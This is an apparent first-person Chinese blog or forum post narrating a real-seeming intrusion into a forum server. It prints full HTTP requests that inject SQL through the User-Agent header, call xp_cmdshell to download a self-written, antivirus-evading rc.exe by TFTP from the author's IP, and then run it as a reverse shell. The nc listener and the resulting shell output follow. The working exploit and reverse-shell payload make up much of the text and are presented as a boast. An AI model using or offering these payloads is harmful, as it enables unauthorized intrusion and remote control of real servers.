等了两天都没有反应,我想还是进去看看吧,我就再次拨号上网,这次不是建表这么简单了,我要得到最高权限才罢休。我设计好了一整套方案,先修改管理员的密码,再登陆上传文档,得到shell后提升权限,哈哈,是不是很完美啊?
我觉得人要乐观一点,于是我想先试试MSSQL存储过程能不能调用,下面是简单的过程,简直是异乎寻常的顺利啊。嗯,十八岁以下的小朋友就不要看了,免得犯罪。
NC到bbs.xxxxxxxx.com的80口,提交如下的请求
GET /boardhelp.asp HTTP/1.1
Accept: */*
Accept-Language: zh-cn
Accept-Encoding: gzip, deflate
User-Agent: 1','1','1',2,'c',1);exec master.dbo.xp_cmdshell 'tftp -i 61.155.251.70 get rc.exe';--
Host: bbs.xxxxxxxx.com
Connection: Keep-Alive
Cookie: iscookies=0; ASPSESSIONIDGGQGQTDQ=IILFJNDALPMLEMDLCKKFFMJG
我开了TFTP服务的,我想成功的话他会从我的机器上下载一个rc.exe,这是我写的一个小东西,不会被查杀的。然后我断线再拨(因为假如BBS在Online表中查到了您的IP的话,就不会执行到有问题的那一句了),在本机监听1102端口,再次连接到bbs.xxxxxxxx.com,提交
GET /boardhelp.asp HTTP/1.1
Accept: */*
Accept-Language: zh-cn
Accept-Encoding: gzip, deflate
User-Agent: 1','1','1',2,'c',1);exec master.dbo.xp_cmdshell 'rc.exe 61.155.250.193 1102';--
Host: bbs.xxxxxxxx.com
Connection: Keep-Alive
Cookie: iscookies=0; ASPSESSIONIDGGQGQTDQ=
IILFJNDALPMLEMDLCKKFFMJG
NC开始反应了,呵呵
D:/hack>nc -l -p 1102
The shell is now!
Microsoft Windows 2000 [Version 5.00.2195]
(C) 版权任何 1985-2000 Microsoft Corp.
C:/WINNT/system32>ipconfig /all
ipconfig /all
Windows 2000 IP Configuration
Host Name . . . . . . . . . . . . : dns
Primary DNS Suffix . . . . . . . :
Node Type . . . . . . . . . . . . : Broadcast
IP Routing Enabled. . . . . . . . : No
WINS Proxy Enabled. . . . . . . . : No
Ethernet adapter 本地连接:
Connection-specific DNS Suffix . :
Description . . . . . . . . . . . : HP 10/100TX PCI Ethernet Driver
Physical Address. . . . . . . . . : 00-30-6E-36-57-AA
DHCP Enabled. . . . . . . . . . . : No
IP Address. . . . . . . . . . . . : ★.★.★.★
Subnet Mask . . . . . . . . . . . : ★.★.★.★
Default Gateway . . . . . . . . . : ★.★.★.★
DNS Servers . . . . . . . . . . . : ★.★.★.★
★.★.★.★
哇哈哈哈……我刚要进一步动作,结果突然上网卡没钱断掉了,看来我天生命就不该做坏事,shit!
嗯,到这里基本上是顺利的攻破了吧。其实实际的情况是很惨不忍睹的,我前后拨号上网十几次,中间断线,打错字符,更有之前的安装MSSQL失败,IIS出问题,断电,看错代码空高兴十几秒钟等等等等。但是写的时候还是只把主要的过程写出来,要是要去写整个过程的话,估计一篇长篇叙事小说就会诞生了。
